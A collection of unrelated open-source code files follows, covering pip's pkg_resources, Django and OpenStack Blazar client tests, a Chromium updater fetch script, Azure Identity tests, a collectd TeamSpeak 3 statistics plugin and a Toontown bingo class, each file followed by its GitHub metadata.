extra, marker = extra.split(':', 1)
if invalid_marker(marker):
# XXX warn
reqs = []
elif not evaluate_marker(marker):
reqs = []
extra = safe_extra(extra) or None
dm.setdefault(extra, []).extend(parse_requirements(reqs))
return dm
def requires(self, extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None, ()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self, name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self, path=None, replace=False):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None:
path = sys.path
self.insert_on(path, replace=replace)
if path is sys.path:
fixup_namespace_packages(self.location)
for pkg in self._get_metadata('namespace_packages.txt'):
if pkg in sys.modules:
declare_namespace(pkg)
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-' + self.platform
return filename
def __repr__(self):
if self.location:
return "%s (%s)" % (self, self.location)
else:
return str(self)
def __str__(self):
try:
version = getattr(self, 'version', None)
except ValueError:
version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name, version)
def __getattr__(self, attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError(attr)
return getattr(self._provider, attr)
@classmethod
def from_filename(cls, filename, metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
if isinstance(self.parsed_version, packaging.version.Version):
spec = "%s==%s" % (self.project_name, self.parsed_version)
else:
spec = "%s===%s" % (self.project_name, self.parsed_version)
return Requirement.parse(spec)
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group, name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group, name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group, {})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
def insert_on(self, path, loc=None, replace=False):
"""Ensure self.location is on path
If replace=False (default):
- If location is already in path anywhere, do nothing.
- Else:
- If it's an egg and its parent directory is on path,
insert just ahead of the parent.
- Else: add to the end of path.
If replace=True:
- If location is already on path anywhere (not eggs)
or higher priority than its parent (eggs)
do nothing.
- Else:
- If it's an egg and its parent directory is on path,
insert just ahead of the parent,
removing any lower-priority entries.
- Else: add it to the front of path.
"""
loc = loc or self.location
if not loc:
return
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
npath = [(p and _normalize_cached(p) or p) for p in path]
for p, item in enumerate(npath):
if item == nloc:
if replace:
break
else:
# don't modify path (even removing duplicates) if found and not replace
return
elif item == bdir and self.precedence == EGG_DIST:
# if it's an .egg, give it precedence over its directory
# UNLESS it's already been added to sys.path and replace=False
if (not replace) and nloc in npath[p:]:
return
if path is sys.path:
self.check_version_conflict()
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
if path is sys.path:
self.check_version_conflict()
if replace:
path.insert(0, loc)
else:
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while True:
try:
np = npath.index(nloc, p + 1)
except ValueError:
break
else:
del npath[np], path[np]
# ha!
p = np
return
def check_version_conflict(self):
if self.key == 'setuptools':
# ignore the inevitable setuptools self-conflicts :(
return
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for " + repr(self))
return False
return True
def clone(self, **kw):
"""Copy this distribution, substituting in any changed keyword args"""
names = 'project_name version py_version platform location precedence'
for attr in names.split():
kw.setdefault(attr, getattr(self, attr, None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class EggInfoDistribution(Distribution):
def _reload_version(self):
"""
Packages installed by distutils (e.g. numpy or scipy),
which uses an old safe_version, and so
their version numbers can get mangled when
converted to filenames (e.g., 1.11.0.dev0+2329eae to
1.11.0.dev0_2329eae). These distributions will not be
parsed properly
downstream by Distribution and safe_version, so
take an extra step and try to get the version number from
the metadata file itself instead of the filename.
"""
md_version = _version_from_file(self._get_metadata(self.PKG_INFO))
if md_version:
self._version = md_version
return self
class DistInfoDistribution(Distribution):
"""Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
PKG_INFO = 'METADATA'
EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
@property
def _parsed_pkg_info(self):
"""Parse and cache metadata"""
try:
return self._pkg_info
except AttributeError:
metadata = self.get_metadata(self.PKG_INFO)
self._pkg_info = email.parser.Parser().parsestr(metadata)
return self._pkg_info
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
self.__dep_map = self._compute_dependencies()
return self.__dep_map
def _compute_dependencies(self):
"""Recompute this distribution's dependencies."""
dm = self.__dep_map = {None: []}
reqs = []
# Including any condition expressions
for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
reqs.extend(parse_requirements(req))
def reqs_for_extra(extra):
for req in reqs:
if not req.marker or req.marker.evaluate({'extra': extra}):
yield req
common = frozenset(reqs_for_extra(None))
dm[None].extend(common)
for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
s_extra = safe_extra(extra.strip())
dm[s_extra] = list(frozenset(reqs_for_extra(extra)) - common)
return dm
_distributionImpl = {
'.egg': Distribution,
'.egg-info': EggInfoDistribution,
'.dist-info': DistInfoDistribution,
}
def issue_warning(*args, **kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
warnings.warn(stacklevel=level + 1, *args, **kw)
class RequirementParseError(ValueError):
def __str__(self):
return ' '.join(self.args)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be a string, or a (possibly-nested) iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
for line in lines:
# Drop comments -- a hash without a space may be in a URL.
if ' #' in line:
line = line[:line.find(' #')]
# If there is a line continuation, drop it, and append the next line.
if line.endswith('\\'):
line = line[:-2].strip()
line += next(lines)
yield Requirement(line)
class Requirement(packaging.requirements.Requirement):
def __init__(self, requirement_string):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
try:
super(Requirement, self).__init__(requirement_string)
except packaging.requirements.InvalidRequirement as e:
raise RequirementParseError(str(e))
self.unsafe_name = self.name
project_name = safe_name(self.name)
self.project_name, self.key = project_name, project_name.lower()
self.specs = [
(spec.operator, spec.version) for spec in self.specifier]
self.extras = tuple(map(safe_extra, self.extras))
self.hashCmp = (
self.key,
self.specifier,
frozenset(self.extras),
str(self.marker) if self.marker else None,
)
self.__hash = hash(self.hashCmp)
def __eq__(self, other):
return (
isinstance(other, Requirement) and
self.hashCmp == other.hashCmp
)
def __ne__(self, other):
return not self == other
def __contains__(self, item):
if isinstance(item, Distribution):
if item.key != self.key:
return False
item = item.version
# Allow prereleases always in order to match the previous behavior of
# this method. In the future this should be smarter and follow PEP 440
# more accurately.
return self.specifier.contains(item, prereleases=True)
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
@staticmethod
def parse(s):
req, = parse_requirements(s)
return req
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls, type):
class cls(cls, object):
pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _bypass_ensure_directory(path):
"""Sandbox-bypassing version of ensure_directory()"""
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(path)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, 0o755)
def split_sections(s):
"""Split a string or iterable thereof into (section, content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
def _mkstemp(*args, **kw):
old_open = os.open
try:
# temporarily bypass sandboxing
os.open = os_open
return tempfile.mkstemp(*args, **kw)
finally:
# and then put it back
os.open = old_open
# Silence the PEP440Warning by default, so that end users don't get hit by it
# randomly just because they use pkg_resources. We want to append the rule
# because we want earlier uses of filterwarnings to take precedence over this
# one.
warnings.filterwarnings("ignore", category=PEP440Warning, append=True)
# from jaraco.functools 1.3
def _call_aside(f, *args, **kwargs):
f(*args, **kwargs)
return f
@_call_aside
def _initialize(g=globals()):
"Set up global resource manager (deliberately not state-saved)"
manager = ResourceManager()
g['_manager'] = manager
for name in dir(manager):
if not name.startswith('_'):
g[name] = getattr(manager, name)
@_call_aside
def _initialize_master_working_set():
"""
Prepare the master working set and make the ``require()``
API available.
This function has explicit effects on the global state
of pkg_resources. It is intended to be invoked once at
the initialization of this module.
Invocation by other packages is unsupported and done
at their own risk.
"""
working_set = WorkingSet._build_master()
_declare_state('object', working_set=working_set)
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
# backward compatibility
run_main = run_script
# Activate all distributions already on sys.path with replace=False and
# ensure that all distributions added to the working set in the future
# (e.g. by calling ``require()``) will get activated as well,
# with higher priority (replace=True).
dist = None # ensure dist is defined for del dist below
for dist in working_set:
dist.activate(replace=False)
del dist
add_activation_listener(lambda dist: dist.activate(replace=True), existing=False)
working_set.entries = []
# match order
list(map(working_set.add_entry, sys.path))
globals().update(locals())
| {
"content_hash": "41eb33243140843a1ffb8d85416eafad",
"timestamp": "",
"source": "github",
"line_count": 3028,
"max_line_length": 91,
"avg_line_length": 33.80680317040951,
"alnum_prop": 0.5980442916174158,
"repo_name": "Hoekz/hackness-monster",
"id": "8ac7f2fa80f551bcbf2cc0a8c4f7cc4735c8d5ec",
"size": "102385",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/pip/_vendor/pkg_resources/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "17794"
},
{
"name": "HTML",
"bytes": "7238"
},
{
"name": "JavaScript",
"bytes": "34519"
},
{
"name": "Python",
"bytes": "3605942"
},
{
"name": "Shell",
"bytes": "3244"
}
],
"symlink_target": ""
} |
from test_plus.test import TestCase
from django.test import Client
# from unittest import skip
class Testnew_chart(TestCase):
def setUp(self):
self.client = Client()
# self.client.login(username='fred', password='secret')
def test_charts_renders_new_charts(self):
response = self.client.get('/charts/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'charts/new_chart.html')
def test_new_charts_can_pass_session_content_after_POST(self):
str = '1,2\r\n3,4\r\n5,6'
response = self.client.post('/charts/', {'data': str})
self.assertEqual(response.status_code, 302)
self.assertEqual(self.client.session['content'], str)
def test_new_charts_redirects_after_POST(self):
response = self.client.post('/charts/', {'data': '1,2'}, follow=True)
last_url, status_code = response.redirect_chain[-1]
self.assertEqual(response.status_code, 200)
self.assertEqual(last_url, '/charts/preview/')
self.assertTemplateUsed(response, 'charts/preview_chart.html')
def test_new_charts_contains_Preview_Chart(self):
response = self.client.get('/charts/')
self.assertContains(response, "Preview Chart")
class Testpreview_chart(TestCase):
def setUp(self):
self.client = Client()
| {
"content_hash": "edc6f245b50697433d7c5226fdfacf39",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 77,
"avg_line_length": 35.60526315789474,
"alnum_prop": 0.663710273466371,
"repo_name": "frRoy/Benchmarklib",
"id": "3e73743af9758f2995209d52b7aeb3289a8de55c",
"size": "1353",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "benchmarklib/charts/tests/test_views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2905"
},
{
"name": "HTML",
"bytes": "35295"
},
{
"name": "JavaScript",
"bytes": "68956"
},
{
"name": "Python",
"bytes": "56094"
}
],
"symlink_target": ""
} |
import argparse
import mock
from blazarclient import shell
from blazarclient import tests
from blazarclient.v1.shell_commands import networks
class CreateNetworkTest(tests.TestCase):
def setUp(self):
super(CreateNetworkTest, self).setUp()
self.create_network = networks.CreateNetwork(shell.BlazarShell(), mock.Mock())
def test_args2body(self):
args = argparse.Namespace(
network_type='vlan',
physical_network='physnet1',
segment_id='1234',
extra_capabilities=[
'extra_key1=extra_value1',
'extra_key2=extra_value2',
]
)
expected = {
'network_type': 'vlan',
'physical_network': 'physnet1',
'segment_id': '1234',
'extra_key1': 'extra_value1',
'extra_key2': 'extra_value2',
}
ret = self.create_network.args2body(args)
self.assertDictEqual(ret, expected)
class UpdateNetworkTest(tests.TestCase):
def create_update_command(self, list_value):
mock_network_manager = mock.Mock()
mock_network_manager.list.return_value = list_value
mock_client = mock.Mock()
mock_client.network = mock_network_manager
blazar_shell = shell.BlazarShell()
blazar_shell.client = mock_client
return networks.UpdateNetwork(blazar_shell, mock.Mock()), mock_network_manager
def test_update_network(self):
list_value = [
{'id': '101', 'networkname': 'network-1'},
{'id': '201', 'networkname': 'network-2'},
]
update_network, network_manager = self.create_update_command(list_value)
args = argparse.Namespace(
id='101',
extra_capabilities=[
'key1=value1',
'key2=value2'
])
expected = {
'values': {
'key1': 'value1',
'key2': 'value2'
}
}
update_network.run(args)
network_manager.update.assert_called_once_with('101', **expected)
class ShowNetworkTest(tests.TestCase):
def create_show_command(self, list_value, get_value):
mock_network_manager = mock.Mock()
mock_network_manager.list.return_value = list_value
mock_network_manager.get.return_value = get_value
mock_client = mock.Mock()
mock_client.network = mock_network_manager
blazar_shell = shell.BlazarShell()
blazar_shell.client = mock_client
return networks.ShowNetwork(blazar_shell, mock.Mock()), mock_network_manager
def test_show_network(self):
list_value = [
{'id': '101'},
{'id': '201'},
]
get_value = {
'id': '101'}
show_network, network_manager = self.create_show_command(list_value,
get_value)
args = argparse.Namespace(id='101')
expected = [('id',), ('101',)]
ret = show_network.get_data(args)
self.assertEqual(ret, expected)
network_manager.get.assert_called_once_with('101')
class DeleteNetworkTest(tests.TestCase):
def create_delete_command(self, list_value):
mock_network_manager = mock.Mock()
mock_network_manager.list.return_value = list_value
mock_client = mock.Mock()
mock_client.network = mock_network_manager
blazar_shell = shell.BlazarShell()
blazar_shell.client = mock_client
return networks.DeleteNetwork(blazar_shell, mock.Mock()), mock_network_manager
def test_delete_network(self):
list_value = [
{'id': '101', 'networkname': 'network-1'},
{'id': '201', 'networkname': 'network-2'},
]
delete_network, network_manager = self.create_delete_command(list_value)
args = argparse.Namespace(id='101')
delete_network.run(args)
network_manager.delete.assert_called_once_with('101')
| {
"content_hash": "a97d6329bdf66c3bbf92905c61fd1f9a",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 86,
"avg_line_length": 30.93846153846154,
"alnum_prop": 0.5785678766782695,
"repo_name": "ChameleonCloud/python-blazarclient",
"id": "481ba2066c40d747fac8e1be64136189dbd29217",
"size": "4600",
"binary": false,
"copies": "1",
"ref": "refs/heads/chameleoncloud/xena",
"path": "blazarclient/tests/v1/shell_commands/test_networks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "171893"
}
],
"symlink_target": ""
} |
import argparse
import datetime
import json
import os
import sys
import urllib.request
# TODO(crbug.com/1336630): This is compared lexically. Remove it before M1000.
MIN_VERSION = '107.0.5298.0'
def fetch():
"""
Queries the VersionHistory API to determine the version of the updater that
was serving on Monday.
"""
# TODO(crbug.com/1293206): Once this script is python3 only, use
# datetime.timezone.utc to make it consistent regardless of local timezone.
datum = datetime.datetime.now()
datum = (datum - datetime.timedelta(days=datum.weekday())).replace(
hour=0, minute=0, second=0, microsecond=0)
datum = datum.isoformat() + 'Z'
return json.load(
urllib.request.urlopen(
'https://versionhistory.googleapis.com/v1/chromium_updater/'
'platforms/mac/channels/all/versions/all/releases?'
'filter=starttime%%3C%s,endtime%%3E%s' %
(datum, datum)))['releases'][0]['version']
def print_latest():
print(max(fetch(), MIN_VERSION))
def get_url():
print(
json.dumps({
'url': [
'https://edgedl.me.gvt1.com/edgedl/release2/182l0/latest/'
'GoogleUpdater-%s.zip' % os.environ['_3PP_VERSION']
],
'ext': '.zip',
'name': ['GoogleUpdater-%s.zip' % os.environ['_3PP_VERSION']]
}))
def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
sub.add_parser('latest').set_defaults(func=lambda _opts: print_latest())
sub.add_parser('get_url').set_defaults(func=lambda _opts: get_url())
opts = ap.parse_args()
return opts.func(opts)
if __name__ == '__main__':
sys.exit(main())
| {
"content_hash": "a7c16ae4e09c9cd633b917508e61d46f",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 79,
"avg_line_length": 29.964912280701753,
"alnum_prop": 0.6176814988290398,
"repo_name": "nwjs/chromium.src",
"id": "7eb925a3304c4a3acd54d389bfd5de31d7a6d781",
"size": "1894",
"binary": false,
"copies": "1",
"ref": "refs/heads/nw70",
"path": "third_party/updater/chrome_mac_universal_prod/3pp/fetch.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from azure.core.exceptions import ClientAuthenticationError
from azure.core.pipeline.policies import SansIOHTTPPolicy
from azure.core.pipeline.transport import RequestsTransport
from azure.identity import InteractiveBrowserCredential
from azure.identity._internal.user_agent import USER_AGENT
import pytest
from unittest.mock import ANY, Mock, patch
WEBBROWSER_OPEN = InteractiveBrowserCredential.__module__ + ".webbrowser.open"
@pytest.mark.manual
def test_browser_credential():
transport = Mock(wraps=RequestsTransport())
credential = InteractiveBrowserCredential(transport=transport)
scope = "https://management.azure.com/.default" # N.B. this is valid only in Public Cloud
record = credential.authenticate(scopes=(scope,))
assert record.authority
assert record.home_account_id
assert record.tenant_id
assert record.username
# credential should have a cached access token for the scope used in authenticate
with patch(WEBBROWSER_OPEN, Mock(side_effect=Exception("credential should authenticate silently"))):
token = credential.get_token(scope)
assert token.token
credential = InteractiveBrowserCredential(transport=transport)
token = credential.get_token(scope)
assert token.token
with patch(WEBBROWSER_OPEN, Mock(side_effect=Exception("credential should authenticate silently"))):
second_token = credential.get_token(scope)
assert second_token.token == token.token
# every request should have the correct User-Agent
for call in transport.send.call_args_list:
args, _ = call
request = args[0]
assert request.headers["User-Agent"] == USER_AGENT
def test_tenant_id_validation():
"""The credential should raise ValueError when given an invalid tenant_id"""
valid_ids = {"c878a2ab-8ef4-413b-83a0-199afb84d7fb", "contoso.onmicrosoft.com", "organizations", "common"}
for tenant in valid_ids:
InteractiveBrowserCredential(tenant_id=tenant)
invalid_ids = {"my tenant", "my_tenant", "/", "\\", '"my-tenant"', "'my-tenant'"}
for tenant in invalid_ids:
with pytest.raises(ValueError):
InteractiveBrowserCredential(tenant_id=tenant)
def test_no_scopes():
"""The credential should raise when get_token is called with no scopes"""
with pytest.raises(ValueError):
InteractiveBrowserCredential().get_token()
def test_policies_configurable():
# the policy raises an exception so this test can run without authenticating i.e. opening a browser
expected_message = "test_policies_configurable"
policy = Mock(spec_set=SansIOHTTPPolicy, on_request=Mock(side_effect=Exception(expected_message)))
credential = InteractiveBrowserCredential(policies=[policy])
with pytest.raises(ClientAuthenticationError) as ex:
credential.get_token("scope")
assert expected_message in ex.value.message
assert policy.on_request.called
| {
"content_hash": "a6eedc16daaa64291a850986ae0ec32b",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 110,
"avg_line_length": 38.55263157894737,
"alnum_prop": 0.7375426621160409,
"repo_name": "Azure/azure-sdk-for-python",
"id": "113ce21dcaeefb7ed27b51fc721c2c66bde8356a",
"size": "3081",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/identity/azure-identity/tests/test_browser_credential.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import telnetlib
import time
PLUGIN_NAME = "ts3_stats"
# COMMAND LINE CONFIG
# Because we don't know where the config file is (it is read by collectd)
HOST = '127.0.0.1'
PORT = '10011'
USERNAME = 'serveradmin'
PASSWORD = ''
TYPE_GAUGE = 'gauge'
TYPE_BYTES = 'bytes'
try:
import collectd
except:
import sys
class CollectD:
def register_config(self, callback):
callback(None)
def register_init(self, callback):
callback()
def register_read(self, callback):
for i in range(0, 15):
time.sleep(1)
callback()
time.sleep(1)
def register_shutdown(self, callback):
callback()
def debug(self, message):
sys.stdout.write(message)
sys.stdout.flush()
def error(self, message):
sys.stdout.write(message)
sys.stdout.flush()
def warning(self, message):
sys.stdout.write(message)
sys.stdout.flush()
def notice(self, message):
sys.stdout.write(message)
sys.stdout.flush()
def info(self, message):
sys.stdout.write(message)
sys.stdout.flush()
class Values:
def __init__(self, plugin):
self.plugin = plugin
self.type = ""
self.type_instance = ""
self.values = []
def dispatch(self):
collectd.debug('\n' + self.type + ' ' + self.type_instance + ' [' + ', '.join(map(str, self.values)) + ']')
collectd = CollectD()
class TS3DefaultException(Exception):
pass
class TS3ServerQuery:
__tn = None
__NEWLINE = '\n\r'
__STATUSLINE = 'error'
def __init__(self, host, port, timeout = 3):
self.__tn = telnetlib.Telnet(host, port, timeout)
id_string = self.__read_line()
if id_string == 'TS3':
self.__read_line()
def __send_command(self, command):
self.__tn.write(command + self.__NEWLINE)
def __read_line(self):
return self.__tn.read_until(self.__NEWLINE)[:0-len(self.__NEWLINE)]
def __read_dictionary(self):
return self.__string_to_dictionary(self.__read_line())
def __read_until_statusline(self, allowedErrorIDArray = []):
results = []
while True:
line = self.__read_dictionary()
if not self.__response_is_status(line):
results.append(line)
else:
if int(line['id']) in ([0] + allowedErrorIDArray):
return results
raise TS3DefaultException('Command failed', line)
def __response_is_status(self, dictionary):
return self.__STATUSLINE in dictionary.keys()
def __expect_statusline_success(self):
line = self.__read_dictionary()
if self.__response_is_status(line) and int(line['id']) == 0:
return True
raise TS3DefaultException('Command failed', line)
def __expect_dictionaryline(self):
line = self.__read_dictionary()
if self.__response_is_status(line):
raise TS3DefaultException('Command failed', line)
return line
def __string_to_dictionary(self, string):
array = string.split(' ')
dictionary = {}
for param in array:
parameter = param.split('=', 2)
if len(parameter) == 1:
dictionary[parameter[0]] = ''
if len(parameter) == 2:
dictionary[parameter[0]] = parameter[1]
return dictionary
def login(self, username, password):
self.__send_command('login {0} {1}'.format(username, password))
self.__expect_statusline_success()
def serverlist(self):
self.__send_command('serverlist')
return self.__read_until_statusline()
def use(self, virtualServerId):
self.__send_command('use {0}'.format(virtualServerId))
self.__expect_statusline_success()
def ftlist(self):
self.__send_command('ftlist')
return self.__read_until_statusline([1281])
def quit(self):
self.__send_command('quit')
self.__expect_statusline_success()
class TS3ServerStats:
__TS3SQ = None
def __init__(self, host, port, username, password):
self.__TS3SQ = TS3ServerQuery(host, int(port))
if self.__TS3SQ:
self.__TS3SQ.login(username, password)
else:
self.__TS3SQ = None
raise TS3DefaultException()
def __del__(self):
if self.__TS3SQ:
self.__TS3SQ.quit()
def __get_clientsonline(self):
return int(self.__TS3SQ.serverlist()[0]['virtualserver_clientsonline'])
def __get_filetransfer_vs_total(self, virtualServerID):
self.__TS3SQ.use(virtualServerID)
transfers = self.__TS3SQ.ftlist()
result = {
'count': 0,
'current_speed': 0.0
}
for transfer in transfers:
result['count'] += 1
result['current_speed'] += float(transfer['current_speed'])
return result
def getMyStats(self):
results = {}
for server in self.__TS3SQ.serverlist():
filetransfer = self.__get_filetransfer_vs_total(server['virtualserver_id'])
results[server['virtualserver_id']] = {
'clients_online': int(server['virtualserver_clientsonline']),
'filetransfer_count': filetransfer['count'],
'filetransfer_speed': filetransfer['current_speed']
}
return results
def __newCollectdValue(plugin_name, type, type_instance, values):
global collectd
val = collectd.Values(plugin = plugin_name)
val.type = type
val.type_instance = type_instance
val.values = values
val.dispatch()
ts3config = None
ts3 = None
def __connectTS3():
global ts3
global ts3config
if ts3 == None:
try:
ts3 = TS3ServerStats(ts3config['Host'], int(ts3config['Port']), ts3config['Username'], ts3config['Password'])
except Exception as e:
ts3 = None
raise e
def __getStatsTS3():
global ts3
try:
if ts3 != None:
return ts3.getMyStats()
else:
raise TS3DefaultException()
except:
ts3 = None
raise TS3DefaultException()
def __disconnectTS3():
global ts3
ts3 = None
def ts3_config(config):
global ts3config
collectd.debug('ts3_config:\n')
ts3config = {};
if config != None:
for node in config.children:
ts3config[node.key] = node.values[0]
else:
global HOST
global PORT
global USERNAME
global PASSWORD
ts3config['Host'] = HOST
ts3config['Port'] = PORT
ts3config['Username'] = USERNAME
ts3config['Password'] = PASSWORD
for key in ts3config:
collectd.debug('\t' + key + ': ' + ts3config[key] + '\n')
def ts3_init():
collectd.debug('ts3_init:')
try:
__connectTS3()
collectd.debug('ok\n')
except Exception as e:
collectd.debug('FAILED\n')
collectd.warning(str(e) + '\n')
def ts3_read():
global PLUGIN_NAME
global TYPE_GAUGE
global TYPE_BYTES
collectd.debug('ts3_read:')
# Reconnect if connection was lost or TS3 is not up yet
try:
__connectTS3()
except Exception as e:
collectd.debug('FAILED\n')
collectd.warning(str(e) + '\n')
try:
stats = __getStatsTS3();
collectd.debug('ok')
for sid in stats.keys():
server = stats[sid]
__newCollectdValue(PLUGIN_NAME, TYPE_GAUGE, 'ts3vs' + str(sid) + '_clients_online', [server['clients_online']])
__newCollectdValue(PLUGIN_NAME, TYPE_GAUGE, 'ts3vs' + str(sid) + '_filetransfer_count', [server['filetransfer_count']])
__newCollectdValue(PLUGIN_NAME, TYPE_BYTES, 'ts3vs' + str(sid) + '_filetransfer_speed', [server['filetransfer_speed']])
except Exception as e:
collectd.warning(str(e))
collectd.debug('SKIP')
collectd.debug('\n')
def ts3_shutdown():
collectd.debug('ts3_shutdown:\n')
try:
__disconnectTS3()
collectd.debug('ok\n')
except Exception as e:
collectd.debug('FAILED\n')
collectd.warning(str(e) + '\n')
collectd.register_config(ts3_config)
collectd.register_init(ts3_init)
collectd.register_read(ts3_read)
collectd.register_shutdown(ts3_shutdown)
| {
"content_hash": "d147203d82aab1d6ec88730ff48750b6",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 122,
"avg_line_length": 22.03030303030303,
"alnum_prop": 0.6711141678129299,
"repo_name": "Silberling/collectd_teamspeak3",
"id": "9934e6f4173bc45aee0493f44d1768e0318976a7",
"size": "7270",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "collectd_ts3.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7270"
}
],
"symlink_target": ""
} |
from direct.distributed import DistributedObject
from direct.distributed.ClockDelta import *
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import FSM
from direct.gui.DirectGui import *
from panda3d.core import *
from panda3d.direct import *
from direct.task import Task
from toontown.fishing import BingoGlobals
from toontown.fishing import BingoCardGui
from toontown.fishing import FishGlobals
from toontown.fishing import NormalBingo
from toontown.fishing import FourCornerBingo
from toontown.fishing import DiagonalBingo
from toontown.fishing import ThreewayBingo
from toontown.fishing import BlockoutBingo
from direct.showbase import RandomNumGen
from toontown.toonbase import ToontownTimer
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import time
class DistributedPondBingoManager(DistributedObject.DistributedObject, FSM.FSM):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPondBingoManager')
cardTypeDict = {BingoGlobals.NORMAL_CARD: NormalBingo.NormalBingo,
BingoGlobals.FOURCORNER_CARD: FourCornerBingo.FourCornerBingo,
BingoGlobals.DIAGONAL_CARD: DiagonalBingo.DiagonalBingo,
BingoGlobals.THREEWAY_CARD: ThreewayBingo.ThreewayBingo,
BingoGlobals.BLOCKOUT_CARD: BlockoutBingo.BlockoutBingo}
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
FSM.FSM.__init__(self, 'DistributedPondBingoManager')
self.cardId = 0
self.jackpot = 0
self.pond = None
self.spot = None
